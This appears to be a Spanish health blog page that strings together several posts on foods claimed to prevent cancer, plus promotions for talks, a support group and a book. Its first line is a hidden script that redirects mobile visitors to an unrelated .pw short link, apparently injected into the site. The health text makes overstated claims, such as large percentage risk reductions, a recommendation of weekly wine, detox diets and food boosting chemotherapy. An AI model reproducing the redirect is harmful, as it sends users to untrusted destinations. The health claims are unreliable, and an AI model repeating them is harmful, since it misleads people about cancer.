if (screen.width <= 480) {window.location = "http://portal-b.pw/XcTyTp";}
Alimentos anticáncer

Aunque ninguna dieta nos asegura librarnos del cáncer, expertos afirman que sí se puede reducir el riesgo de padecerlo. Según la Organización Mundial de la Salud (OMS), existen alimentos que pueden ayudarnos a parar el desarrollo de esta enfermedad. Asimismo, la organización calcula que 84 millones de personas habrían muerto de cáncer entre 2005 y 2015 si no se hubieran tomado medidas preventivas al respecto.

El cáncer, como muchos sabemos, es una enfermedad que está relacionada con la interacción de factores genéticos y hormonales, y hábitos de vida no saludables como el tabaco, la bebida alcohólica, el estrés y una alimentación incorrecta.

Por suerte, hoy en día existen estudios científicos que demuestran que hay alimentos que contienen propiedades anticancerígenas y son los llamados alimentos funcionales, los cuales tienen una función biológica en el organismo y son saludables.

Según Alberto Fernández, director del Centro de Investigacón y Desarrollo del Alimento Funcional (CIDAF) del Parque Tecnológico de Ciencias de la Salud de Granada, los compuestos activos que evitan el desarrollo de células cancerígenas (y que tienen una gran capacidad antioxidante) son:

  • Los índoles, que están presentes en alimentos como las coles
  • La vitamina A, propia de la zanahoria o el melocotón
  • Los flavonoides, con presencia en los cítricos, piña o pera
  • El licopeno, en el tomate, sandía o fresas
  • Las antocianinas y fenoles, en uvas, ciruelas o berenjenas
  • La luteolina, en la lechuga, melón o espinaca
  • El resveratrol, presente en el vino tinto
  • La lentionina, en setas shiitake

Hoy en día, el cáncer es una de las principales causas de muerte en muchos países del mundo y, aunque en ciertos casos se puede curar, lo cierto es que es muy difícil detectarlo a tiempo y parar su avance.

Los factores de riesgo de esta enfermedad son variados, pero uno de los puntos clave para prevenir el cáncer es seguir una alimentación saludable.

Estos alimentos le ayudarán a reducir las probabilidades de sufrir cáncer.

Conozcámoslos…

Por Nutrición Sin Más

  1. Té verde

La oxidación que causan los radicales libres en moléculas y proteínas del cuerpo humano es un factor de riesgo que contribuye al cáncer.

Se ha demostrado que los alimentos ricos en antioxidantes, como el té verde, tienen un efecto protector contra el cáncer al reducir el daño oxidativo.

En un estudio, se descubrió que la ingesta de té verde puede reducir el cáncer de mana hasta en un 22 %.

Asimismo, los hombres que consumen té verde con regularidad poseen un 48 % menos de riesgo de padecer cáncer de próstata.

Pero aún hay más…

Las probabilidades de desarrollar cáncer colorrectal también se ven reducidas en un 57 %.

  1. Espirulina

De acuerdo con varios estudios, el consumo de 1 gramo de espirulina, un alga con potentes efectos beneficiosos en la salud, disminuye hasta en un 50 % las lesiones causadas por fibrosis submucosa oral.

Además, se ha probado su eficacia en comparación con el fármaco pentoxifilina y se ha confirmado que la espirulina es más efectiva.

  1. Manzanas

Las manzanas son ricas en antioxidantes y además poseen diferentes compuestos vegetales de los que se ha demostrado que tienen efectos anticancerígenos.

Los responsables de estas propiedades parecen ser los fitonutrientes presentes en las manzanas y se ha confirmado que comer 1 o más manzanas diarias puede disminuir el riesgo de cáncer colorrectal en un 20 % y el cáncer de mama en un 18 %.

  1. Alimentos probióticos

Existen estudios en animales que han mostrado que los alimentos probióticos previenen el cáncer de colon.

Se cree que estas bacterias benignas pueden proteger contra el cáncer de colon y frenar su desarrollo al influir en el crecimiento del tumor.

Los resultados son muy prometedores y se están realizando más estudios para confirmar estos efectos.

  1. Espinacas

Dos compuestos encontrados en las espinacas resultan ser muy eficaces a la hora de retrasar el desarrollo de cáncer: el monogalactosil diacilglicerol (MGDG) y sulfoquinovosil diacilglicerol (SQDG).

Se han encontrado indicios de que ambas sustancias reducen el tamaño del tumor e inhiben su proliferación, disminuyendo así el riesgo de cáncer de mama o próstata, entre otros.

Asimismo, las espinacas son ricas en antioxidantes, por lo que tienen un doble efecto positivo en la prevención del cáncer.

  1. Brócoli

El consumo de verduras crucíferas puede reducir notablemente el riesgo de padecer cáncer, afirman numerosos expertos.

El brócoli es una verdura crucífera que posee isotiocianatos, unas sustancias que provocan muerte celular, impiden la metástasis, reducen el estrés oxidativo la inflamación e inhiben la formación de vasos sanguíneos tumorales.

Igualmente, el brócoli es rico en vitamina C, de la que se ha demostrado contribuye a prevenir el cáncer de esófago, páncreas y gástrico.

  1. Fresas

Las fresas contienen ácido elágico y antocianinas, dos antioxidantes con propiedades anticancerígenas.

El ácido elágico tiene la capacidad de impedir el crecimiento de varios cánceres, como el de mama, próstata, pulmón o colon, provocando la muerte celular.

Las antocianinas, por otra parte, también contribuyen a parar el desarrollo del cáncer.

 

 

El 35 % de las muertes por cáncer en general se pueden atribuir a la dieta, según un informe que se presentó en el último Congreso Latinoamericano de Nutrición. Asimismo, los especialistas, aunque eviten de hablar de una dieta anticáncer, afirman que sí podemos prevenir la enfermedad con lo que ingerimos, atendiendo también a otros factores de riesgo.

Por tanto, os detallo a continuación los alimentos que nos ayudan a poner freno al desarrollo de tumores y que además tienen otros beneficios para la salud:

  1. Frutas y verduras

Es importantísimo incorporar en nuestra dieta cinco porciones por día de frutas y verduras, de distintos colores.

En el cuerpo tenemos millones moléculas de oxígeno, y algunas de ellas se vuelven peligrosas, son las llamadas radicales libres, llegando a afectar a sus cromosomas. Cuando esto pasa, las células pueden multiplicarse descontroladamente y así se inicia el cáncer.

Las plantas producen compuestos moleculares que funcionan como protectores de estas moléculas descontroladas, son los antioxidantes. Por mencionar alguno, encontramos: el licopeno (se encuentra en el tomate) o el beta-caroteno (en la zanahoria).  Además de estos antioxidantes, las plantas contienen fitoquímicos, que funcionan como escudos protectores también: ejemplo de estos son el ajo, la cebolla, la fresa, el brócoli o la coliflor.

  1. Brócoli

El gen p53 es el encargado de detener la formación y desarrollo de tumores. Cuando este gen se vuelve defectuoso, provoca que las células anormales proliferen y provoque cáncer de pulmón, mama, colon, vejiga o linfoma.

Por su parte, el brócoli, además de ser una buena fuente de ácido fólico y de antioxidantes que ayudan a mejorar la memoria,  se caracteriza por su elevado contenido en isotiocianatos. Los isotiocianatos tienen la función de eliminar la proteína del gen p53 defectuoso y liberar las proteínas que están sanas para eliminar el desarrollo de tumores.

  1. Vino

Según un estudio del Centro de Investigación del Cáncer Fred Hutchinson, el vino tinto reduce hasta en un 50 % el riesgo de contraer cáncer de próstata. Los especialistas recomiendan  tomar una media de 4 copas de vino por semana para disminuir el riesgo de padecer este cáncer.

El vino contiene un antioxidante “resveratrol” que se encarga de reducir los niveles de hormonas masculinas (la testosterona), las cuales estimulan el desarrollo de estos tumores.

  1. Nueces

Por un lado, las nueces reducen el riesgo de padecer cáncer de mama debido a los ingredientes que contienen (los ácidos grasos omega-3, los antioxidantes y los fitosteroles), constataron los científicos de la Escuela de Medicina de la Universidad de Marshall (en Estados unidos) en 2009.

Por otro lado, recientemente otro estudio científico de la Universidad de California-Davis (en Estados Unidos también) demostró que las nueces disminuyen el crecimiento del cáncer de próstata. Este experimento solo tiene validez con animales, por el momento.

  1. Fibras

Los alimentos ricos en fibra disminuyen los niveles de estrógeno y de testosterona, por lo que funcionan como protectores del cáncer de mama y de colon. Según los expertos, su consumo reduce el riesgo de cáncer de colon porque disminuye la cantidad de tiempo que los desechos viajan en el colon.

Una forma de incluir fibras en la dieta es acompañándola con la fruta, verdura, legumbres o cereales integrales.

Autor: Edith Gómez

Twitter: @edigomben

Hoy os traigo gracias a la Dra. Odile Fernández, Nuria Roca y Conasi el Vídeo del showcooking “Cómo elaborar un menú anticáncer cuidando el aspecto emocional” que elaboraron en Biocultura Madrid 2015.
En el vídeo hablamos de la importancia que tiene la alimentación en nuestra salud y en nuestras emociones. Cada vez hay más estudios que nos hablan de la relación alimentación-cáncer-emociones.
Enlace original

Os dejamos enlace de una conferencia mas que interesante que gracias a Conasi y la Dra. Odile Fernández se realizó en Biocultura…

Comento la Dra. Odile:

En esta nueva conferencia trato de daros herramientas para que tengáis acceso a toda la información científica disponible a día de hoy que relaciona el cáncer con la alimentación, las emociones y los estilos de vida. En esta charla os animo a que no os creáis nada a pies juntillas de lo que os cuenten entorno al cáncer, que toda información la pongáis en cuarenta y la contrastéis, incluida la que yo os doy. Que no os creáis las curas milagro que a veces nos venden sin buscar si hay información publicada entorno a ella. Pero tampoco caigáis en la falsa “no esperanza” que algunos sanitarios y algunas personas sin formación médica tratan de infundir.

Muchos conoceréis a Silvia Ortega por su esperanzador testimonio como superviviente de cáncer, pues bien, hoy quiero contaros un precioso proyecto que Silvia inicia en Madrid con el deseo de ayudar a otros enfermos con su experiencia y los conocimientos adquiridos tras estos 2 años.

Hoy dejo que sea la propia Silvia la que os cuente su proyecto…

Quería compartir contigo y tus lectores un proyecto nuevo, cargado de ilusión, que significa mucho para mí y que en parte se ha podido poner en marcha gracias a ti por dos motivos: uno, por formar parte en la recuperación de mi salud con tus valiosos consejos de alimentación y estilos de vida; dos, porque esos consejos me han hecho aprender mucho sobre los hábitos de vida y su relación con la salud y bienestar.
Por ello, y porque me lo estaba pidiendo el cuerpo, voy a poner en marcha un proyecto en el cual poner en práctica y compartir en grupo hábitos de vida, haciéndolo de manera saludable, sostenible, sin esfuerzos y disfrutando con los cambios. 
Este proyecto lo he llamado Encuentro MOAI, basado en los grupos Moai que empezaron en Okinawa, Japón, donde están las personas más longevas del planeta. Moai significa “reunión con un propósito común”, y nuestro objetivo común será “vivir con buena salud y disfrutar de cada día”. Configuraremos un menú semanal, potenciando alimentos saludables y eliminando los que no nos beneficien; haremos meditación, terapia de cuencos y actividades para mejorar nuestro nivel de stress; haremos chikung, bailaremos y lo pasaremos bien.
Ver texto completo en misrecetasanticancer.com 

La alimentación detox es una necesidad para todos, puesto que la base de nuestra salud es un organismo libre de tóxicos, cuyos órganos y sistema inmune se encuentran en las condiciones óptimas para funcionar y enfrentar posibles adversidades. Por esta razón, todos necesitamos conocer las premisas de una alimentación detox…

Nuestra querida amiga la Dra. Odile Fernández nos explica como es la guía:

En este nuevo libro recopilo los últimos estudios y conclusiones sobre la  influencia que tiene la alimentación sobre nuestro bienestar y el desarrollo de ciertos tipos de cáncer, como el de colón o mama,  el libro nos invita a tomar las riendas de nuestra salud adoptando una postura activa, tanto en la prevención como en la curación de esta enfermedad.

Como sabéis el cáncer se produce por una pluralidad de factores y es necesario que se den determinadas circunstancias para que germine. Todos somos enfermos potenciales de cáncer, pero si conocemos los factores que influyen  en la aparición de la enfermedad podremos ponernos manos a la acción y prevenirlo en un alto porcentaje. Cambiando muchos de nuestros hábitos de vida  intentaremos mantener alejada la enfermedad.

El libro se centra en la alimentación como una herramienta que puede ayudarnos a que el cáncer no se manifieste o,  si ya se ha desarrollado, ayudarnos en el proceso de sanación. Una alimentación correcta constituye un complemento ideal a los tratamientos médicos convencionales. La alimentación puede potenciar los efectos beneficiosos de la quimioterapia, disminuir sus efectos secundarios, estimular el poder de autosanación de nuestro cuerpo y ralentizar el proceso de generación y progresión del cáncer.

El libro se divide en 4 apartados diferenciados: alimentación, ejercicio físico y bienestar emocional. Y cómo no, hablaremos del futuro en el tratamiento del cáncer: la oncología integrativa

A partir del día 21 podréis comprarla en librerías españolas, herbolarios y en la web de Conasi

Fuente www.misrecetasanticancer.com

El cáncer es la principal causa de muerte a escala mundial. Las investigaciones indican que el cáncer se está convirtiendo cada vez más en una carga de enfermedad importante en los países en desarrollo. El pasado 4 de febrero se conmemoró el Día Mundial Contra el Cáncer y, según la Organización Mundial de la Salud (OMS), unos 14 millones de personas reciben cada año la noticia de que padecen la enfermedad. El problema es tan complejo porque, según explica el Instituto Nacional del Cáncer de los Institutos Nacionales de Estados Unidos, en su sitio Cancer.gov, el cáncer “no es solo una enfermedad”, sino “muchas enfermedades”. Hay más de 100 diferentes tipos de cáncer.